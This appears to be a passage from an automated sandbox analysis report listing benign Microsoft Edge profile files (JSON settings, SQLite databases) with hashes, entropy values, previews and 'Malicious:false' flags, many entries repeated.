                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):61
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.926136109079379
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LSL:YHpoeSL
                                                                                                                                                                                                                                                                                  MD5:4DF4574BFBB7E0B0BC56C2C9B12B6C47
                                                                                                                                                                                                                                                                                  SHA1:81EFCBD3E3DA8221444A21F45305AF6FA4B71907
                                                                                                                                                                                                                                                                                  SHA-256:E1B77550222C2451772C958E44026ABE518A2C8766862F331765788DDD196377
                                                                                                                                                                                                                                                                                  SHA-512:78B14F60F2D80400FE50360CF303A961685396B7697775D078825A29B717081442D357C2039AD0984D4B622976B0314EDE8F478CDE320DAEC118DA546CB0682A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1119092095371985
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:TKIopKWurJNVr1GJmA8pv82pfurJNVrdHXuccaurJN2VrJ1n4n1GmzNGU1cSBRWH:eIEumQv8m1ccnvS6ZziOY
                                                                                                                                                                                                                                                                                  MD5:93462A4304F9600B0A17058637338D8C
                                                                                                                                                                                                                                                                                  SHA1:A428D6BFA20D253C2FFB07489E71948C6B5C9445
                                                                                                                                                                                                                                                                                  SHA-256:F05EC7D58D6F5D9C47CD324AEA4328199091E575B71244858C3508B2BA51CADC
                                                                                                                                                                                                                                                                                  SHA-512:75B138E7762D013E0CA80EF0AFB03781FDD369CF48A7739DA3805493E1F05AE83F44396889074937A78CA3921586EC9C9D8EE25598B72A02998AE90BFFD2678A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):203
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.4042796420747425
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:6:YAQN1iL50xHA9vh8wXwlmUUAnIMp5sXX2SQ:Y45Sg9vt+UAnIXZQ
                                                                                                                                                                                                                                                                                  MD5:24D66E5F1B8C76C76511DA68057CDE5E
                                                                                                                                                                                                                                                                                  SHA1:70225FEC1AE3FEF8D8A767D9EA0B0E108BF8F10D
                                                                                                                                                                                                                                                                                  SHA-256:D5CB3A4A104E2EC4F13E8B4CDF3BD469E0AB638713928BEA1EAEAF03998B794C
                                                                                                                                                                                                                                                                                  SHA-512:1CA093B4BB4E0B3EE0B791AD0E6B39AC9640CEB6ED005BD10A10B4AF904858F4898D86D26B60B625CDA9425FF317C6B9FE0DF2E12C897A52720AF775B19491AA
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"expect_ct":[],"sts":[{"expiry":1727869700.805692,"host":"dUymlFcJcEIuWrPNRCRXYtREHxXDHdPfT47kO1IQnQ0=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1696333700.805702}],"version":2}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):111
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKtiVY:YHpoeS7PMVKJTnMRK3VY
                                                                                                                                                                                                                                                                                  MD5:285252A2F6327D41EAB203DC2F402C67
                                                                                                                                                                                                                                                                                  SHA1:ACEDB7BA5FBC3CE914A8BF386A6F72CA7BAA33C6
                                                                                                                                                                                                                                                                                  SHA-256:5DFC321417FC31359F23320EA68014EBFD793C5BBED55F77DAB4180BBD4A2026
                                                                                                                                                                                                                                                                                  SHA-512:11CE7CB484FEE66894E63C31DB0D6B7EF66AD0327D4E7E2EB85F3BCC2E836A3A522C68D681E84542E471E54F765E091EFE1EE4065641B0299B15613EB32DCC0D
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[]
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6852315298663104
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:TLiOUOq0afDdWec9sJEpMl741miI7J5fc:TOOUzDbg39pMldc
                                                                                                                                                                                                                                                                                  MD5:19F8A237057D855585E293B39C348D63
                                                                                                                                                                                                                                                                                  SHA1:6DFC800D2C67A332B72884BDDEDE8A231EAEB35F
                                                                                                                                                                                                                                                                                  SHA-256:86E8C808D16056DAFA4449DE639D0C5F372B654C319516D5FC598DDD7FC4045E
                                                                                                                                                                                                                                                                                  SHA-512:FFD7FDF11BC4C78963D8420DE2E1BDCC611ADB93FE5F9D094BBE1C79D1E1A4D0CD3A95EF60760A6BFB719170DBD0DE1929AB28D0268E7A02B489E0F84E71078B
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14307
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202386489124765
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JZCm4keYhYojREDj8/pj+FnYQwpvUj1f:sV6LAJu43J4mBdaopUYQw1k
                                                                                                                                                                                                                                                                                  MD5:9256AFBD2DEA8E81D7023E722D3B0AA2
                                                                                                                                                                                                                                                                                  SHA1:C026DB0F267F58CA724AECFBA62D129DB31687F7
                                                                                                                                                                                                                                                                                  SHA-256:923297D81BF2960D2BADFF3DFA2A3D1DE88557F386C21C8D28E92FFEF6CBE4AB
                                                                                                                                                                                                                                                                                  SHA-512:24BEE28D4E3E17752F45F852A1F53130979C18065E3F6B255D4B1A974AAD6BB0158A648995055D9450AB4EF30D973871CC05E7D7F097644B10E0EF54EB98F81E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14307
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202386489124765
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JZCm4keYhYojREDj8/pj+FnYQwpvUj1f:sV6LAJu43J4mBdaopUYQw1k
                                                                                                                                                                                                                                                                                  MD5:9256AFBD2DEA8E81D7023E722D3B0AA2
                                                                                                                                                                                                                                                                                  SHA1:C026DB0F267F58CA724AECFBA62D129DB31687F7
                                                                                                                                                                                                                                                                                  SHA-256:923297D81BF2960D2BADFF3DFA2A3D1DE88557F386C21C8D28E92FFEF6CBE4AB
                                                                                                                                                                                                                                                                                  SHA-512:24BEE28D4E3E17752F45F852A1F53130979C18065E3F6B255D4B1A974AAD6BB0158A648995055D9450AB4EF30D973871CC05E7D7F097644B10E0EF54EB98F81E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14307
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202386489124765
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JZCm4keYhYojREDj8/pj+FnYQwpvUj1f:sV6LAJu43J4mBdaopUYQw1k
                                                                                                                                                                                                                                                                                  MD5:9256AFBD2DEA8E81D7023E722D3B0AA2
                                                                                                                                                                                                                                                                                  SHA1:C026DB0F267F58CA724AECFBA62D129DB31687F7
                                                                                                                                                                                                                                                                                  SHA-256:923297D81BF2960D2BADFF3DFA2A3D1DE88557F386C21C8D28E92FFEF6CBE4AB
                                                                                                                                                                                                                                                                                  SHA-512:24BEE28D4E3E17752F45F852A1F53130979C18065E3F6B255D4B1A974AAD6BB0158A648995055D9450AB4EF30D973871CC05E7D7F097644B10E0EF54EB98F81E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):14307
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.202386489124765
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:sV6J9pQTryZiuaba4uyp3JZCm4keYhYojREDj8/pj+FnYQwpvUj1f:sV6LAJu43J4mBdaopUYQw1k
                                                                                                                                                                                                                                                                                  MD5:9256AFBD2DEA8E81D7023E722D3B0AA2
                                                                                                                                                                                                                                                                                  SHA1:C026DB0F267F58CA724AECFBA62D129DB31687F7
                                                                                                                                                                                                                                                                                  SHA-256:923297D81BF2960D2BADFF3DFA2A3D1DE88557F386C21C8D28E92FFEF6CBE4AB
                                                                                                                                                                                                                                                                                  SHA-512:24BEE28D4E3E17752F45F852A1F53130979C18065E3F6B255D4B1A974AAD6BB0158A648995055D9450AB4EF30D973871CC05E7D7F097644B10E0EF54EB98F81E
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13380417156669336","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117794":{"last_path":""},"380c71d3-10bf-4a5d-9a06-c932e4b7d1d8":{"last_path":""},"3a2f4dee-d482-4ef8-baef-cb22b649608c":{"last_path":""},"3b5ee6f6-5322-4061-81e4-d976818
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
